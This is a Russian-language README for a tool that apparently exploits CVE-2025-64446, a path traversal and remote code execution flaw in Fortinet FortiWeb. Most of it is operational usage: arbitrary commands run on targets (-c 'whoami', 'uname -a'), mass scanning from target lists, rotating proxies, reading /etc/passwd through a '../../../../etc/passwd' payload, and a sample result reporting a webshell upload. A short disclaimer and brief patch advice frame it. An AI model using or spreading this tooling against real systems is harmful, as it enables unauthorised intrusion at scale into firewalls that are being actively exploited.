
Инструмент для исследования безопасности для обнаружения и тестирования CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)
Инструмент для исследования безопасности, предназначенный для обнаружения и тестирования уязвимости CVE-2025-64446 в брандмауэре веб-приложений Fortinet FortiWeb (WAF). Эта критическая уязвимость нулевого дня, связанная с обходом пути, активно эксплуатируется в реальных условиях и позволяет неаутентифицированным злоумышленникам обходить средства защиты и выполнять произвольный код.
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам незаконен. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
CVE-2025-64446 — это критическая уязвимость нулевого дня, связанная с обходом пути в Fortinet FortiWeb WAF, которая активно эксплуатируется в реальных условиях. Эта уязвимость позволяет неаутентифицированным злоумышленникам обходить средства защиты с помощью атак обхода пути, что может привести к удаленному выполнению кода, доступу к конфигурационным файлам и полной компрометации системы.
Оценка CVSS: 9.8 (Критическая)
Статус: Активно эксплуатируется в реальных условиях
CISA KEV: Добавлен в каталог известных эксплуатируемых уязвимостей
Патч: FG-IR-25-910
Затронутый продукт: Fortinet FortiWeb WAF
# Клонируйте репозиторий
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit
# Установите зависимости
pip install -r requirements.txt
# Сделайте скрипты исполняемыми (опционально)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py
# Загрузите скрипты
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py
# Установите зависимости
pip install requests
# Одна цель
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com
# Выполнение пользовательской команды
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"
# Несколько целей из файла
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
# С многопоточностью для более быстрого сканирования
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5
# Подробный вывод для отладки
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v
# Один прокси
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port
# Несколько прокси из файла
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Базовый POC-тест
python3 cve_2025_64446_poc.py -u http://target.com
# Тестирование конкретного файла
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd
# Подробный вывод
python3 cve_2025_64446_poc.py -u http://target.com -v
-u, --url Целевой URL
-f, --file Файл, содержащий целевые URL (по одному на строку)
-c, --command Команда для выполнения (по умолчанию: id)
-t, --threads Количество потоков (по умолчанию: 1)
-o, --output Выходной файл (по умолчанию: uknf_fortiweb_results.json)
-v, --verbose Включить подробное логирование
--proxy URL прокси (например, http://127.0.0.1:8080)
--proxy-list Файл, содержащий URL прокси (по одному на строку)
Скрипт генерирует JSON-файл с подробными результатами:
{
"target": "http://target.com",
"timestamp": "2025-11-21T00:25:40.123456",
"fortiweb_detected": true,
"vulnerable": true,
"path_traversal_successful": true,
"config_file_read": true,
"webshell_uploaded": true,
"command_executed": "id",
"output": "uid=1000(user) gid=1000(user)...",
"vulnerable_payload": "../../../../etc/passwd"
}
Если вы используете FortiWeb WAF:
Немедленно установите обновления безопасности:
# Проверьте текущую версию
show system status
# Обновитесь до последней версии
execute upgrade <firmware-file>
Сегментация сети:
Усиление конфигурации:
Требования CISA:
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com
# Создайте файл с целями
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt
# Запустите сканирование
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"
# Один прокси
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080
# Несколько прокси из файла
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt
# Базовый POC
python3 cve_2025_64446_poc.py -u https://example.com
# Тестирование конкретного файла
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd